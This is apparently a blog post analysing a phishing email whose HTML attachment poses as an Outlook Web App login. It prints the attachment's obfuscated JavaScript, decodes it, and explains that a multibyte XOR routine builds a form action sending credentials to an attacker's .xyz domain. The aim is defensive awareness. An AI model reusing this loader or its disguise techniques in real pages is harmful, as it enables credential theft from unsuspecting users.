SPAM or Disguised MS Outlook?— Credentials Harvester
It is not fun to watch end users, company stakeholders, company management receiving such emails. Most of the times, I have seen Invoice emails, Email not received type of mails etc. Over the period of time I have took few samples to look into over a period of time in order to gain more insights onto how the newbies and highly sophisticated attackers are using this known technique of Social Engineering nowadays.
In one of the sample, which derived my interest was it contained an attachment with the disguised text that your emails are rejected. But the thing to be noted was that the attachment was not an excel, pdf neither a word document. In fact it was an HTML file. But Why?
Let’s take a look into what this HTML file has to offer.
On opening the HTML file. It looked like this. An Outlook Web App. Pretty disguised. The attacker has auto filled the email field with the actual email of the recipient. Which in this I had to remove!
So, before entering the login details. I have opened the file in Visual Studio Code. On looking the code. We can see that the attacker is trying to harvest the below information.
The CSS code was just for styling and nothing else. But I found a comment which was uncommented in a unique way and my eyes caught an EVAL function. Well, it seems like this might be the actual stuff.
document.write(unescape("%3Chtml%3E%0A%3Chead%3E%0A%3C/head%3E%0A%3Cbody%3E%0A%0A%3Cscript%20type%3D%22text/javascript%22%3E%0A%3C%21--%20%0Aeval%28unescape%28%27%2566%2575%256e%2563%2574%2569%256f%256e%2520%2566%2539%2539%2563%2531%2534%2566%2528%2573%2529%2520%257b%250a%2509%2576%2561%2572%2520%2572%2520%253d%2520%2522%2522%253b%250a%2509%2576%2561%2572%2520%2574%256d%2570%2520%253d%2520%2573%252e%2573%2570%256c%2569%2574%2528%2522%2539%2538%2538%2530%2539%2536%2535%2522%2529%253b%250a%2509%2573%2520%253d%2520%2575%256e%2565%2573%2563%2561%2570%2565%2528%2574%256d%2570%255b%2530%255d%2529%253b%250a%2509%256b%2520%253d%2520%2575%256e%2565%2573%2563%2561%2570%2565%2528%2574%256d%2570%255b%2531%255d%2520%252b%2520%2522%2536%2532%2533%2533%2533%2530%2522%2529%253b%250a%2509%2566%256f%2572%2528%2520%2576%2561%2572%2520%2569%2520%253d%2520%2530%253b%2520%2569%2520%253c%2520%2573%252e%256c%2565%256e%2567%2574%2568%253b%2520%2569%252b%252b%2529%2520%257b%250a%2509%2509%2572%2520%252b%253d%2520%2553%2574%2572%2569%256e%2567%252e%2566%2572%256f%256d%2543%2568%2561%2572%2543%256f%2564%2565%2528%2528%2570%2561%2572%2573%2565%2549%256e%2574%2528%256b%252e%2563%2568%2561%2572%2541%2574%2528%2569%2525%256b%252e%256c%2565%256e%2567%2574%2568%2529%2529%255e%2573%252e%2563%2568%2561%2572%2543%256f%2564%2565%2541%2574%2528%2569%2529%2529%252b%2534%2529%253b%250a%2509%257d%250a%2509%2572%2565%2574%2575%2572%256e%2520%2572%253b%250a%257d%250a%27%29%29%3B%0Aeval%28unescape%28%27%2564%256f%2563%2575%256d%2565%256e%2574%252e%2577%2572%2569%2574%2565%2528%2566%2539%2539%2563%2531%2534%2566%2528%2527%27%29%20+%20%27%253b%2560%256e%2566%2560%251b%2554%2559%2572%2566%2568%2569%2539%251d%2566%2575%2578%2565%2568%253f%252d%2529%2570%2566%2569%256f%2568%2560%2575%2567%2562%256f%2578%2576%2567%2568%2569%256c%252a%2577%2577%2573%2523%2526%2535%253c%252a%2530%2532%255c%256f%252c%2531%2533%255a%2564%2566%252b%2526%2534%2563%256c%256c%2528%255e%2562%2562%256e%2557%2524%252b%2527%2533%252c%252f%2531%2532%255f%256f%256d%2529%2527%253b%252c%2569%2573%256c%2562%256c%252c%2531%2537%2563%2563%2568%2522%256c%2556%2567%255f%2569%2571%2562%256e%256c%2567%256e%2562%2527%252b%2527%252b%2529%256c%255e%2572%255f%2562%2528%2569%256c%2565%2519%2515%256f%2563%2573%2567%2568%2560%253a%251c%2549%2543%2546%2557%2517%251a%2568%255e%256a%2562%2539%251d%256a%256e%256b%2562%256d%254b%256d%256c%256a%251d%251f%2541%2549%253d%2555%255d%2545%2546%2530%2518%255f%256f%256f%256b%2565%255c%255f%2575%256d%2562%256d%2522%2572%252b%2570%2570%2570%2529%2561%2569%256b%2561%2520%2576%2567%256e%2563%2569%255c%2568%2560%2562%2562%251b%2514%2554%2576%2579%256d%255d%2568%256a%256f%2568%2562%2572%2564%2531%2517%256c%256b%2564%251c%25399880965%2533%2532%2535%2538%2539%2537%2539%27%20+%20unescape%28%27%2527%2529%2529%253b%27%29%29%3B%0A//%20--%3E%0A%3C/script%3E%0A%3Cnoscript%3E%3Ci%3EJavascript%20required%3C/i%3E%3C/noscript%3E%0A%0A%3C/html%3E%0A%0A"));
The data was URL Encoded. So, I moved onto decoding it and it yielded below data.
document.write(unescape("<html>
<head>
</head>
<body><script type="text/javascript">
<!--
eval(unescape('%66%75%6e%63%74%69%6f%6e%20%66%39%39%63%31%34%66%28%73%29%20%7b%0a%09%76%61%72%20%72%20%3d%20%22%22%3b%0a%09%76%61%72%20%74%6d%70%20%3d%20%73%2e%73%70%6c%69%74%28%22%39%38%38%30%39%36%35%22%29%3b%0a%09%73%20%3d%20%75%6e%65%73%63%61%70%65%28%74%6d%70%5b%30%5d%29%3b%0a%09%6b%20%3d%20%75%6e%65%73%63%61%70%65%28%74%6d%70%5b%31%5d%20%2b%20%22%36%32%33%33%33%30%22%29%3b%0a%09%66%6f%72%28%20%76%61%72%20%69%20%3d%20%30%3b%20%69%20%3c%20%73%2e%6c%65%6e%67%74%68%3b%20%69%2b%2b%29%20%7b%0a%09%09%72%20%2b%3d%20%53%74%72%69%6e%67%2e%66%72%6f%6d%43%68%61%72%43%6f%64%65%28%28%70%61%72%73%65%49%6e%74%28%6b%2e%63%68%61%72%41%74%28%69%25%6b%2e%6c%65%6e%67%74%68%29%29%5e%73%2e%63%68%61%72%43%6f%64%65%41%74%28%69%29%29%2b%34%29%3b%0a%09%7d%0a%09%72%65%74%75%72%6e%20%72%3b%0a%7d%0a'));
eval(unescape('%64%6f%63%75%6d%65%6e%74%2e%77%72%69%74%65%28%66%39%39%63%31%34%66%28%27') '%3b%60%6e%66%60%1b%54%59%72%66%68%69%39%1d%66%75%78%65%68%3f%2d%29%70%66%69%6f%68%60%75%67%62%6f%78%76%67%68%69%6c%2a%77%77%73%23%26%35%3c%2a%30%32%5c%6f%2c%31%33%5a%64%66%2b%26%34%63%6c%6c%28%5e%62%62%6e%57%24%2b%27%33%2c%2f%31%32%5f%6f%6d%29%27%3b%2c%69%73%6c%62%6c%2c%31%37%63%63%68%22%6c%56%67%5f%69%71%62%6e%6c%67%6e%62%27%2b%27%2b%29%6c%5e%72%5f%62%28%69%6c%65%19%15%6f%63%73%67%68%60%3a%1c%49%43%46%57%17%1a%68%5e%6a%62%39%1d%6a%6e%6b%62%6d%4b%6d%6c%6a%1d%1f%41%49%3d%55%5d%45%46%30%18%5f%6f%6f%6b%65%5c%5f%75%6d%62%6d%22%72%2b%70%70%70%29%61%69%6b%61%20%76%67%6e%63%69%5c%68%60%62%62%1b%14%54%76%79%6d%5d%68%6a%6f%68%62%72%64%31%17%6c%6b%64%1c%399880965%33%32%35%38%39%37%39' unescape('%27%29%29%3b'));
// -->
</script>
<noscript><i>Javascript required</i></noscript></html>"));
Here we can find three different unescape functions being used. We got to perform URL Decoding twice to reveal the actual function.
document.write(unescape("<html>
<head>
</head>
<body><script type="text/javascript">
<!--
eval(unescape('function f99c14f(s) {
var r = "";
var tmp = s.split("9880965");
s = unescape(tmp[0]);
k = unescape(tmp[1] + "623330");
for( var i = 0; i < s.length; i++) {
r += String.fromCharCode((parseInt(k.charAt(i%k.length))^s.charCodeAt(i))+4);
}
return r;
}
'));
eval(unescape('document.write(f99c14f('') ';`nf`TYrfhi9fuxeh?-)pfioh`ugboxvghil*wws#&5<*02\o,13Zdf+&4cll(^bbnW$+'3,/12_om)';,islbl,17cch"lVg_iqbnlgnb'+'+)l^r_b(ileocsgh`:ICFWh^jb9jnkbmKmljAI=U]EF0_ooke\_umbm"r+ppp)aika vgnci\h`bbTvym]hjohbrd1lkd998809653258979' unescape(''));'));
// -->
</script>
<noscript><i>Javascript required</i></noscript></html>"));
As we have now checked what the JS was about. This JS is generating the FORM action value which then get’s replaced in the actual phishing page as it does not contains the beginning of the form.
The technique used here to obfuscate the code XOR Multibyte!
Now let us try adding a sample username and password to check the exact behavior of this Credential Harvester.
On providing the credentials and clicking on Login. The page requests a website hosted over .xyz domain.
The passwords are being stored using the sauce.php, Well they are indeed creating a good sauce by harvesting more credentials.
As the attacker is quite good at creating pages. So he has used a redirection method to redirect the users to another page.
Eventually leading to the below page!
This states that you have successfully fixed your email delivery problem. Well, on this page we can see another script which is to set a timeout for redirecting user to where?
The timer is set to redirect the users to Microsoft Official Website, providing details on troubleshooting. This is just to make the users able to read that they have solved the issue. The redirection is to disguise the users in order to feel them comfortable.
Also, on checking Whois information. We can see that these domains were registered in January 2021. Which means that these domains are fairly new and are being used actively for harvesting AD/Outlook credentials for further compromising the victims.
The domains is still active and if you have got the privilege to reach at this end. Kindly block these domains in your organization as well.
Conclusion
Never trust the emails you received outside of your organization. Always be vigilant with the attachments you find with such emails. Report such cases to your organizational Information Security Department/Concerned Department.
If you have intentionally/unintentionally have opened the attachment and have added your credentials. Change your passwords immediately. Disconnect your system from the internal network. Reach out the Incident Response Unit or file the incident. Finally enable MFA everywhere.
Thank you for reading!